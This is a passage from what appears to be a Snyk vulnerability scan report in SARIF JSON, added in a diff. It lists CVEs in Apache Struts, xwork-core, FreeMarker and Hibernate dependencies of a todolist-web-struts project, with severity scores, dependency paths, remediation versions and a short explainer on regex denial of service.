very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.\n\n# Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.29, 2.5.1 or higher.\n# References\n- [GitHub Commit](https://github.com/apache/struts/commit/a0fdca138feec2c2e94eb75ca1f8b76678b4d152)\n- [GitHub Commit](https://github.com/apache/struts/commit/eccc31ebce5430f9e91b9684c63eaaf885e603f9)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4465)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-20", + "maven" + ], + "cvssv3_baseScore": 5.3, + "security-severity": "5.3" + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-5707101", + "shortDescription": { + "text": "Medium severity - Allocation of Resources Without Limits or Throttling vulnerability in org.apache.struts:struts2-core" + }, + "fullDescription": { + "text": "(CVE-2023-34149) org.apache.struts:struts2-core@2.3.20" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.struts:struts2-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT and org.apache.struts:struts2-core@2.3.20\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20\n# Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling due to improper handling of `getProperty()` by the `XWorkListPropertyAccessor` class.\r\nExploiting this vulnerability is possible if the developer has set `CreateIfNull` to true for the underlying Collection type field.\r\n\r\n# Workaround\r\n\r\nSet `CreateIfNull` to false for Collection type fields (it is false by default if not set).\n# Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.5.31, 6.1.2.1 or higher.\n# References\n- [GitHub Commit](https://github.com/apache/struts/commit/2d6f1bc0a6f5ac575a56784ac6461816b67c4f21)\n- [Security Advisory](https://cwiki.apache.org/confluence/display/WW/S2-063)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-770", + "maven" + ], + "cvssv3_baseScore": 4.3, + "security-severity": "4.3" + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-608098", + "shortDescription": { + "text": "High severity - Denial of Service (DoS) vulnerability in org.apache.struts:struts2-core" + }, + "fullDescription": { + "text": "(CVE-2019-0233) org.apache.struts:struts2-core@2.3.20" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.struts:struts2-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT and org.apache.struts:struts2-core@2.3.20\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20\n# Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). When a file upload is performed to an `Action` that exposes the file with a getter, an attacker may manipulate the request such that the working copy of the uploaded file is set to read-only. As a result, subsequent actions on the file will fail with an error. It might also be possible to set the Servlet container's temp directory to read-only, such that subsequent upload actions will fail.\n# Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.5.22 or higher.\n# References\n- [Security Bulletin](https://cwiki.apache.org/confluence/display/WW/S2-060)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-400", + "maven" + ], + "cvssv3_baseScore": 7.5, + "security-severity": "7.5" + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-609765", + "shortDescription": { + "text": "High severity - Unrestricted Upload of File with Dangerous Type vulnerability in org.apache.struts:struts2-core" + }, + "fullDescription": { + "text": "(CVE-2012-1592) org.apache.struts:struts2-core@2.3.20" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.struts:struts2-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT and org.apache.struts:struts2-core@2.3.20\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20\n# Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Unrestricted Upload of File with Dangerous Type. A local code execution issue exists in Apache Struts2 when processing malformed XSLT files, which could let a malicious user upload and execute arbitrary files.\n# Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.5 or higher.\n# References\n- [Bug Report](https://issues.apache.org/jira/browse/WW-5055)\n- [GitHub Commit](https://github.com/apache/struts/commit/4271682d2b944e9022e4e4c499df43e0ce7e58fd)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-434", + "maven" + ], + "cvssv3_baseScore": 8.8, + "security-severity": "8.8" + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-6100744", + "shortDescription": { + "text": "Medium severity - Denial of Service vulnerability in org.apache.struts:struts2-core" + }, + "fullDescription": { + "text": "(CVE-2023-41835) org.apache.struts:struts2-core@2.3.20" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.struts:struts2-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT and org.apache.struts:struts2-core@2.3.20\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20\n# Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Denial of Service when certain fields exceed the `maxStringLength` limit during multipart requests. An attacker can exploit this to leave uploaded files in the `struts.multipart.saveDir` even after the request has been denied resulting in excessive disk usage.\n# Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.5.32, 6.1.2.2, 6.3.0.1 or higher.\n# References\n- [GitHub Commit](https://github.com/apache/struts/commit/3292152f8c0a77ee4827beede82b6580478a2c2a)\n- [GitHub Commit](https://github.com/apache/struts/commit/4c044f12560e22e00520595412830f9582d6dac7)\n- [GitHub Commit](https://github.com/apache/struts/commit/bf54436869c264941dd192c752a4abfaa65d3711)\n- [Struts Issue](https://cwiki.apache.org/confluence/display/WW/S2-065)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-400", + "maven" + ], + "cvssv3_baseScore": 5.3, + "security-severity": "5.3" + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30798", + "shortDescription": { + "text": "High severity - Parameter Alteration vulnerability in org.apache.struts.xwork:xwork-core" + }, + "fullDescription": { + "text": "(CVE-2015-5209) org.apache.struts.xwork:xwork-core@2.3.20" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.struts.xwork:xwork-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, org.apache.struts:struts2-core@2.3.20 and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20 › org.apache.struts.xwork:xwork-core@2.3.20\n# Overview\n[`org.apache.struts.xwork:xwork-core`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22xwork-core%22)\nAffected versions of the package are vulnerable to Parameter Alteration. ValueStack defines special top object which represents root of execution context. It can be used to manipulate Struts' internals or can be used to affect container's settings\n\n\n# References\n- [Apache Security Advisory](https://struts.apache.org/docs/s2-026.html)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-235", + "maven" + ], + "cvssv3_baseScore": 7.5, + "security-severity": "7.5" + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30799", + "shortDescription": { + "text": "High severity - Improper Input Validation vulnerability in org.apache.struts.xwork:xwork-core" + }, + "fullDescription": { + "text": "(CVE-2016-0785) org.apache.struts.xwork:xwork-core@2.3.20" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.struts.xwork:xwork-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, org.apache.struts:struts2-core@2.3.20 and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20 › org.apache.struts.xwork:xwork-core@2.3.20\n# Overview\n[org.apache.struts.xwork:xwork-core](https://mvnrepository.com/artifact/org.apache.struts.xwork/xwork-core) is a generic command pattern framework. It forms the core of Struts 2.\n\nAffected versions of this package are vulnerable to Improper Input Validation via a `%{}` sequence in a tag attribute, aka forced double OGNL evaluation.\n# Remediation\nUpgrade `org.apache.struts.xwork:xwork-core` to version 2.3.28 or higher.\n# References\n- [GitHub Commit](https://github.com/apache/struts/commit/15857a69e7baf3675804495a5954cd0756ac8364)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-20", + "maven" + ], + "cvssv3_baseScore": 8.8, + "security-severity": "8.8" + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30800", + "shortDescription": { + "text": "Medium severity - Cross-site Scripting (XSS) vulnerability in org.apache.struts.xwork:xwork-core" + }, + "fullDescription": { + "text": "(CVE-2016-2162) org.apache.struts.xwork:xwork-core@2.3.20" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.struts.xwork:xwork-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, org.apache.struts:struts2-core@2.3.20 and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20 › org.apache.struts.xwork:xwork-core@2.3.20\n# Overview\n[`org.apache.struts.xwork:xwork-core`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22xwork-core%22)\nApache Struts 2.x before 2.3.25 does not sanitize text in the Locale object constructed by I18NInterceptor, which might allow remote attackers to conduct cross-site scripting (XSS) attacks via unspecified vectors involving language display.\n\n# Details\nA cross-site scripting attack occurs when the attacker tricks a legitimate web-based application or site to accept a request as originating from a trusted source.\r\n\r\nThis is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.\r\n\r\nֿInjecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.\r\n\r\nEscaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, `<` can be coded as `<`; and `>` can be coded as `>`; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses `<` and `>` as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.\r\n \r\nThe most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware. \r\n\r\n## Types of attacks\r\nThere are a few methods by which XSS can be manipulated:\r\n\r\n|Type|Origin|Description|\r\n|--|--|--|\r\n|**Stored**|Server|The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.|\r\n|**Reflected**|Server|The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.| \r\n|**DOM-based**|Client|The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.|\r\n|**Mutated**| |The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.|\r\n\r\n## Affected environments\r\nThe following environments are susceptible to an XSS attack:\r\n\r\n* Web servers\r\n* Application servers\r\n* Web application environments\r\n\r\n## How to prevent\r\nThis section describes the top best practices designed to specifically protect your code: \r\n\r\n* Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches. \r\n* Convert special characters such as `?`, `&`, `/`, `<`, `>` and spaces to their respective HTML or URL encoded equivalents. \r\n* Give users the option to disable client-side scripts.\r\n* Redirect invalid requests.\r\n* Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.\r\n* Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.\r\n* Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.\n\n\n# References\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-2162)" + }, + "properties": { + "tags": [ + "security", + "CWE-79", + "maven" + ], + "cvssv3_baseScore": 6.1, + "security-severity": "6.1" + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30801", + "shortDescription": { + "text": "Medium severity - Improper Input Validation vulnerability in org.apache.struts.xwork:xwork-core" + }, + "fullDescription": { + "text": "(CVE-2016-3093) org.apache.struts.xwork:xwork-core@2.3.20" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.struts.xwork:xwork-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, org.apache.struts:struts2-core@2.3.20 and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20 › org.apache.struts.xwork:xwork-core@2.3.20\n# Overview\n[`org.apache.struts.xwork:xwork-core`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22xwork-core%22)\nApache Struts 2.0.0 through 2.3.24.1 does not properly cache method references when used with OGNL before 3.0.12, which allows remote attackers to cause a denial of service (block access to a web site) via unspecified vectors.\n\n# References\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3093)" + }, + "properties": { + "tags": [ + "security", + "CWE-20", + "maven" + ], + "cvssv3_baseScore": 5.3, + "security-severity": "5.3" + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30802", + "shortDescription": { + "text": "High severity - Access Restriction Bypass vulnerability in org.apache.struts.xwork:xwork-core" + }, + "fullDescription": { + "text": "(CVE-2016-4433) org.apache.struts.xwork:xwork-core@2.3.20" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.struts.xwork:xwork-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, org.apache.struts:struts2-core@2.3.20 and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20 › org.apache.struts.xwork:xwork-core@2.3.20\n# Overview\n[org.apache.struts.xwork:xwork-core](https://mvnrepository.com/artifact/org.apache.struts.xwork/xwork-core) is a generic command pattern framework. It forms the core of Struts 2.\n\nAffected versions of this package are vulnerable to Access Restriction Bypass. It allows remote attackers to bypass intended access restrictions and conduct redirection attacks via a crafted request.\n# Remediation\n# References\n- [GitHub Commit](https://github.com/apache/struts/commit/b28b78c062f0bf3c79793a25aab8c9b6c12bce6e)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4433)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-20", + "maven" + ], + "cvssv3_baseScore": 7.5, + "security-severity": "7.5" + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30803", + "shortDescription": { + "text": "High severity - Arbitrary Code Execution vulnerability in org.apache.struts.xwork:xwork-core" + }, + "fullDescription": { + "text": "(CVE-2016-4461) org.apache.struts.xwork:xwork-core@2.3.20" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.struts.xwork:xwork-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, org.apache.struts:struts2-core@2.3.20 and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20 › org.apache.struts.xwork:xwork-core@2.3.20\n# Overview\n[`org.apache.struts.xwork:xwork-core`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22xwork-core%22)\nAffected versions of the package are vulnerable to Remote code Execution. The Apache Struts frameworks when forced, performs double evaluation of attributes' values assigned to certain tags so it is possible to pass in a value that will be evaluated again when a tag's attributes will be rendered.\n\n# References\n- [Apache Security Advisory](https://struts.apache.org/docs/s2-036.html)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-264", + "maven" + ], + "cvssv3_baseScore": 8.8, + "security-severity": "8.8" + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30804", + "shortDescription": { + "text": "Medium severity - Regular Expression Denial of Service (ReDoS) vulnerability in org.apache.struts.xwork:xwork-core" + }, + "fullDescription": { + "text": "(CVE-2016-4465) org.apache.struts.xwork:xwork-core@2.3.20" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.struts.xwork:xwork-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, org.apache.struts:struts2-core@2.3.20 and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20 › org.apache.struts.xwork:xwork-core@2.3.20\n# Overview\n[org.apache.struts.xwork:xwork-core](https://mvnrepository.com/artifact/org.apache.struts.xwork/xwork-core) is a generic command pattern framework. It forms the core of Struts 2.\n\nAffected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). The URLValidator class allows remote attackers to cause a denial of service via a null value for a URL field.\n\n# Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.\n\nThe Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.\n\nLet’s take the following regular expression as an example:\n```js\nregex = /A(B|C+)+D/\n```\n\nThis regular expression accomplishes the following:\n- `A` The string must start with the letter 'A'\n- `(B|C+)+` The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the `+` matches one or more times). The `+` at the end of this section states that we can look for one or more matches of this section.\n- `D` Finally, we ensure this section of the string ends with a 'D'\n\nThe expression would match inputs such as `ABBD`, `ABCCCCD`, `ABCBCCCD` and `ACCCCCD`\n\nIt most cases, it doesn't take very long for a regex engine to find a match:\n\n```bash\n$ time node -e '/A(B|C+)+D/.test(\"ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD\")'\n0.04s user 0.01s system 95% cpu 0.052 total\n\n$ time node -e '/A(B|C+)+D/.test(\"ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX\")'\n1.79s user 0.02s system 99% cpu 1.812 total\n```\n\nThe entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.\n\nMost Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as _catastrophic backtracking_.\n\nLet's look at how our expression runs into this problem, using a shorter string: \"ACCCX\". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:\n1. CCC\n2. CC+C\n3. C+CC\n4. C+C+C.\n\nThe engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use [RegEx 101 debugger](https://regex101.com/debugger) to see the engine has to take a total of 38 steps before it can determine the string doesn't match.\n\nFrom there, the number of steps the engine must use to validate a string just continues to grow.\n\n| String | Number of C's | Number of steps |\n| -------|-------------:| -----:|\n| ACCCX | 3 | 38\n| ACCCCX | 4 | 71\n| ACCCCCX | 5 | 136\n| ACCCCCCCCCCCCCCX | 14 | 65,553\n\n\nBy the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.\n\n# Remediation\nUpgrade `org.apache.struts.xwork:xwork-core` to version 2.3.29 or higher.\n# References\n- [GitHub Commit](https://github.com/apache/struts/commit/a0fdca138feec2c2e94eb75ca1f8b76678b4d152)\n- [GitHub Commit](https://github.com/apache/struts/commit/eccc31ebce5430f9e91b9684c63eaaf885e603f9)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4465)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-20", + "maven" + ], + "cvssv3_baseScore": 5.3, + "security-severity": "5.3" + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-451611", + "shortDescription": { + "text": "High severity - Command Injection vulnerability in org.apache.struts.xwork:xwork-core" + }, + "fullDescription": { + "text": "(CVE-2016-3081) org.apache.struts.xwork:xwork-core@2.3.20" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.struts.xwork:xwork-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, org.apache.struts:struts2-core@2.3.20 and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20 › org.apache.struts.xwork:xwork-core@2.3.20\n# Overview\n[org.apache.struts.xwork:xwork-core](https://mvnrepository.com/artifact/org.apache.struts.xwork/xwork-core) is a generic command pattern framework. It forms the core of Struts 2.\n\nAffected versions of this package are vulnerable to Command Injection. When Dynamic Method Invocation was enabled, a remote attackers could execute arbitrary code via the prefix method, related to chained expressions.\n# Remediation\nUpgrade `org.apache.struts.xwork:xwork-core` to version 2.3.20.2, 2.3.24.2, 2.3.28.1 or higher.\n# References\n- [Exploit DB](https://exploit-db.com/exploits/39756)\n- [GitHub Commit](https://github.com/apache/struts/commit/f238cf4f1091be19fbcfd086b042c86a1bcaa7fc)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3081)\n- [Exploit DB](https://www.exploit-db.com/exploits/39756)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2016/CVE-2016-3081.yaml)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-77", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-474418", + "shortDescription": { + "text": "High severity - Insecure Defaults vulnerability in org.apache.struts.xwork:xwork-core" + }, + "fullDescription": { + "text": "(CVE-2015-1831) org.apache.struts.xwork:xwork-core@2.3.20" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.struts.xwork:xwork-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, org.apache.struts:struts2-core@2.3.20 and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20 › org.apache.struts.xwork:xwork-core@2.3.20\n# Overview\n[org.apache.struts.xwork:xwork-core](https://mvnrepository.com/artifact/org.apache.struts.xwork/xwork-core) is a generic command pattern framework. It forms the core of Struts 2.\n\nAffected versions of this package are vulnerable to Insecure Defaults. The default exclude patterns (excludeParams) allow remote attackers to \"compromise internal state of an application\" via unspecified vectors.\n# Remediation\nUpgrade `org.apache.struts.xwork:xwork-core` to version 2.3.20.1 or higher.\n# References\n- [GitHub Commit](https://github.com/apache/struts/commit/5ebc0643b55d728a6713a82559a594d875452cd8)\n- [GitHub Commit](https://github.com/apache/struts/commit/d832747d647df343ed07a58b1b5e540a05a4d51b)\n- [Jira Issue](https://issues.apache.org/jira/browse/WW-4486)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1831)\n- [Struts Security Advisory](https://struts.apache.org/docs/s2-024.html)\n- [Vulnerability Summary](http://struts.apache.org/docs/s2-024.html)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-453", + "maven" + ], + "cvssv3_baseScore": 7.3, + "security-severity": "7.3" + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-5811864", + "shortDescription": { + "text": "High severity - Improper Input Validation vulnerability in org.apache.struts.xwork:xwork-core" + }, + "fullDescription": { + "text": "(CVE-2016-3090) org.apache.struts.xwork:xwork-core@2.3.20" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.struts.xwork:xwork-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, org.apache.struts:struts2-core@2.3.20 and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20 › org.apache.struts.xwork:xwork-core@2.3.20\n# Overview\n[org.apache.struts.xwork:xwork-core](https://mvnrepository.com/artifact/org.apache.struts.xwork/xwork-core) is a generic command pattern framework. It forms the core of Struts 2.\n\nAffected versions of this package are vulnerable to Improper Input Validation such that the `TextParseUtil.translateVariables` method allows remote attackers to execute arbitrary code via a crafted OGNL expression with ANTLR tooling.\r\n\r\n**Note:**\r\n\r\nThe Struts 2 framework does not pass any user-modifiable input to this method, neither directly nor indirectly. However, a developer crafting a Struts based web application might pass unsanitized user input to `TextParseUtil.translateVariables` or ActionSupport's `getText` methods. In that case a RCE exploitation might be possible.\r\n\r\n# Workaround\r\n\r\nUsers who are unable to upgrade to the fixed version should not pass unsanitized user input to framework methods that include OGNL expression evaluation.\n# Remediation\nUpgrade `org.apache.struts.xwork:xwork-core` to version 2.3.24.1 or higher.\n# References\n- [GitHub Commit](https://github.com/apache/struts/commit/f420f28466cb82915defc4e12466b298c275abaf)\n- [Issue](https://struts.apache.org/docs/s2-027.html)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-20", + "maven" + ], + "cvssv3_baseScore": 8.8, + "security-severity": "8.8" + } + }, + { + "id": "SNYK-JAVA-ORGFREEMARKER-1076795", + "shortDescription": { + "text": "High severity - Server-side Template Injection (SSTI) vulnerability in org.freemarker:freemarker" + }, + "fullDescription": { + "text": "org.freemarker:freemarker@2.3.19" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.freemarker:freemarker\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, org.apache.struts:struts2-core@2.3.20 and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20 › org.freemarker:freemarker@2.3.19\n# Overview\n[org.freemarker:freemarker](https://github.com/apache/freemarker) is a \"template engine\"; a generic tool to generate text output (anything from HTML to auto generated source code) based on templates.\n\nAffected versions of this package are vulnerable to Server-side Template Injection (SSTI). By allowing user input into `java.security.ProtectionDomain.getClassLoader`, templates will get access to the java classloader. This can be further leveraged for file system access and code execution. A low-privileged user is sufficient for exploitation of this vulnerability.\n# Remediation\nUpgrade `org.freemarker:freemarker` to version 2.3.30 or higher.\n# References\n- [GitHub PR](https://github.com/apache/freemarker/pull/62)\n- [Jira Issue](https://issues.apache.org/jira/browse/FREEMARKER-124)\n- [Research Blogpost](https://ackcent.com/in-depth-freemarker-template-injection/)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-94", + "maven" + ], + "cvssv3_baseScore": 7.5, + "security-severity": "7.5" + } + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-1041788", + "shortDescription": { + "text": "High severity - SQL Injection vulnerability in org.hibernate:hibernate-core" + }, + "fullDescription": { + "text": "(CVE-2020-25638) org.hibernate:hibernate-core@4.3.7.Final" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.hibernate:hibernate-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › io.github.snyk:todolist-core@0.0.1-SNAPSHOT › org.hibernate:hibernate-core@4.3.7.Final\n# Overview\n[org.hibernate:hibernate-core](https://github.com/hibernate/hibernate-orm) is a library providing Object/Relational Mapping (ORM) support to applications, libraries, and frameworks.\n\nAffected versions of this package are vulnerable to SQL Injection. A SQL injection in the implementation of the JPA Criteria API can permit unsanitized literals when a literal is used in the SQL comments of the query. This flaw could allow an attacker to access unauthorized information or possibly conduct further attacks. The highest threat from this vulnerability is to data confidentiality and integrity.\n# Remediation\nUpgrade `org.hibernate:hibernate-core` to version 5.4.24.Final or higher.\n# References\n- [GitHub Commit](https://github.com/hibernate/hibernate-orm/commit/59fede7acaaa1579b561407aefa582311f7ebe78)\n- [Redhat CVE Details](https://access.redhat.com/security/cve/cve-2020-25638)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-89", + "maven" + ], + "cvssv3_baseScore": 8.2, + "security-severity": "8.2" + } + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-584563", + "shortDescription": { + "text": "High severity - SQL Injection vulnerability in org.hibernate:hibernate-core" + }, + 